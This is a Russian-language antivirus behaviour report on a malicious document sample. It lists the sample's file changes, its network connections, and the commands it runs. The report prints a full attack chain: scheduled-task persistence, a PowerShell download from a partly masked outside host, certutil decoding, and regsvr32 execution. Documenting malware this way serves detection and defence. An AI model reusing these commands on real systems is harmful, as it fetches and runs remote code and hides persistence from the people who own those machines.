Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\one
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' "%TEMP%\xttemption.vbs"
Загружает и запускает на исполнение
- http://op#####.#sobcertification.com/extracert/index.php как %temp%\1x.txt
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c schtasks /Create /SC MINUTE /MO 3 /TN ONE /TR "%TEMP%\xttemption.vbs" /f
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\xttemption.vbs
- <Текущая директория>\~wrd0000.tmp
Подменяет следующие файлы
- <PATH_SAMPLE>.doc
Сетевая активность
Подключается к
- 'op#####.#sobcertification.com':80
UDP
- DNS ASK op#####.#sobcertification.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c schtasks /Create /SC MINUTE /MO 3 /TN ONE /TR "%TEMP%\xttemption.vbs" /f' (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "%TEMP%\xttemption.vbs"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy ByPass -WindowStyle Normal (New-Object System.Net.WebClient).DownloadFile('http://op#####.#sobcertification.com/extracert/index.php','%TEMP%\1x.txt')' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -decode %TEMP%\1x.txt %TEMP%\2x.dat' (со скрытым окном)
- '<SYSTEM32>\regsvr32.exe' /s /i %TEMP%\2x.dat' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\schtasks.exe' /Create /SC MINUTE /MO 3 /TN ONE /TR "%TEMP%\xttemption.vbs" /f
- '<SYSTEM32>\taskeng.exe' {6C5315F5-59C4-4A82-8043-29479E4B9E8D} S-1-5-21-1960123792-2022915161-3775307078-1001:nbpwwqnwwlhc\user:Interactive:[1]
- '<SYSTEM32>\certutil.exe' -decode %TEMP%\1x.txt %TEMP%\2x.dat
- '<SYSTEM32>\regsvr32.exe' /s /i %TEMP%\2x.dat
